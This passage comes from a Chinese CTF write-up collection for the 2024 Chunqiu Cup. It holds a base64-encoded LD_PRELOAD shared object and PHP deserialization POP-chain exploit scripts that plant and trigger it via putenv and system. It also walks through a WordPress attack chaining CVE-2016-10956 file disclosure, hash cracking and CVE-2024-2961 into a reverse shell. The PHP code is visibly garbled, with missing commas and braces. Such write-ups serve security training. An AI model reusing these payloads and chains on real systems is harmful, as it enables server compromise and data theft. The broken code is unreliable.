AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjYXQgL2YqAExEX1BSRUxPQUQAAAEbAzsoAAAABAAAAAzw//9EAAAAXPD//2wAAAAl8f//hAAAADvx//+kAAAAFAAAAAAAAAABelIAAXgQARsMBwiQAQAAJAAAABwAAADA7///UAAAAAAOEEYOGEoPC3cIgAA/GjsqMyQiAAAAABQAAABEAAAA6O///wgAAAAAAAAAAAAAABwAAABcAAAAmfD//xYAAAAAQQ4QhgJDDQZRDAcIAAAAHAAAAHwAAACP8P//OgAAAABBDhCGAkMNBnUMBwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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";   // 生成的.so文件的base64编码
$this->callback->fun = new FILE;
$this->callback->fun->filename = "hack.so";

$this->back = "a";
}

public function __isset($arg1)
{
system("cat /flag");
$this->callback->p;
echo "You are stupid, what exactly is your identity?";
//flag{fake_flag} really flag is located /fllllllll1ag
}

}
class FILE{
public $filename;
public $enviroment;
public function __get($arg1){
if("hacker"==$this->enviroment){
echo "Hacker is bad guy!!!";
}
}
public function __call($function_name,$value)
{
if (preg_match('/.[^.]*$/'$this->filename, $matches)) {
echo $value[0];
$uploadDir = "/tmp/";
$destination = $uploadDir . md5(time()) . $matches[0];
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755true);
}
file_put_contents($this->filename, $value[0]);
if (rename($this->filename, $destination)) {
echo "文件成功移动到 {$destination}";
else {
echo '文件移动失败。';
}
else {
echo "非法文件名。";
}
}
}
class FUN{
public $fun;
public $value;
public function __get($name)
{
$this->fun->getflag($this->value);
}
}
echo time();
$a = new Env();
$a->math = new DIFF;
echo urlencode(serialize($a));

pop2:

<?php
highlight_file(__FILE__);
//error_reporting(E_ALL);
//ini_set('display_errors', 1);
//system("cat *");
function filter($a)
{
    $pattern = array(''''"','%','(',')',';','bash');
    $pattern = '/' . implode('|', $pattern) . '/i';
    if(preg_match($pattern,$a)){
        die("No inject");
    }
    return $a;
}

class Env{
public $key;
public $value;
public $math;
public function __toString()
{
$key=filter($this->key);
$value=filter($this->value);

putenv("$key=$value");
system("cat robots.txt");
}
public function __wakeup()
{
echo "cccc";
if (isset($this->math->flag))
{
echo "YesYes";
else {
echo "YesYesYes";
}
}
}
class DIFF{
public $callback;
public $back;
private $flag;
public function __construct()
{
$this->callback = new FILE;

$this->callback->enviroment = new Env;
$this->callback->enviroment->value="/tmp/06fe6f06df6b6bc1178fd1b914f3ba05.so";  // 移动的文件名字
$this->callback->enviroment->key="LD_PRELOAD";
}

public function __isset($arg1)
{
system("cat /flag");
$this->callback->p;
echo "You are stupid, what exactly is your identity?";
//flag{fake_flag} really flag is located /fllllllll1ag
}

}
class FILE{
public $filename;
public $enviroment;
public function __get($arg1){
if("hacker"==$this->enviroment){
echo "Hacker is bad guy!!!";
}
}
public function __call($function_name,$value)
{
if (preg_match('/.[^.]*$/'$this->filename, $matches)) {
echo $value[0];
$uploadDir = "/tmp/";
$destination = $uploadDir . md5(time()) . $matches[0];
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755true);
}
file_put_contents($this->filename, $value[0]);
if (rename($this->filename, $destination)) {
echo "文件成功移动到 {$destination}";
else {
echo '文件移动失败。';
}
else {
echo "非法文件名。";
}
}
}
class FUN{
public $fun;
public $value;
public function __get($name)
{
$this->fun->getflag($this->value);
}
}
echo time();
//$c = $_GET[1];
//unserialize($c);

$a = new Env();
$a->math = new DIFF;
echo urlencode(serialize($a));

 

w0rdpress

解题过程

首先看到网站是一个 WordPress, 翻看文章

【WP】2024年春秋杯夏季赛解题思路详解合集

能够得知其用了 SQLite 数据库

此处我们通过搜索可以得知 https://wordpress.org/plugins/sqlite-database-integration/

代码审计可以知道

【WP】2024年春秋杯夏季赛解题思路详解合集

可以知道数据库默认存在 /var/www/html/wp-content/database/.ht.sqlite, 考虑通过 LFI 进行下载

我们通过 wpscan 可以找到有很多过时的插件

关注到 mail-masta 的 CVE-2016-10956, 采用这个工具尝试读取

https://github.com/p0dalirius/CVE-2016-10956-mail-masta/blob/master/CVE-2016-10956_mail_masta.py

【WP】2024年春秋杯夏季赛解题思路详解合集

下载完数据库打开后即可看到有 subscriber 用户

【WP】2024年春秋杯夏季赛解题思路详解合集

密码为 $P$BHU9YuIGcS2XbDZF106dBj0c2tjjfN/, 我们给到 john

【WP】2024年春秋杯夏季赛解题思路详解合集

下面得到密码为 123456

登录之后拿到 cookie,

我们再关注到 RVM 的 Subscriber 读

【WP】2024年春秋杯夏季赛解题思路详解合集

但是一直没有 RCE 的点, 于是考虑打 CVE-2024-2961 LFI to RCE

我们通过subscriber登录

使用 https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

稍微改改脚本的逻辑

之后我们就可以通过 responsive-vector-maps 的任意文件读来发反弹 shell

【WP】2024年春秋杯夏季赛解题思路详解合集

原文始发于微信公众号(春秋伽玛):【WP】2024年春秋杯夏季赛解题思路详解合集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月29日20:45:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【WP】2024年春秋杯夏季赛解题思路详解合集https://cn-sec.com/archives/3012493.html

发表评论

匿名网友 填写信息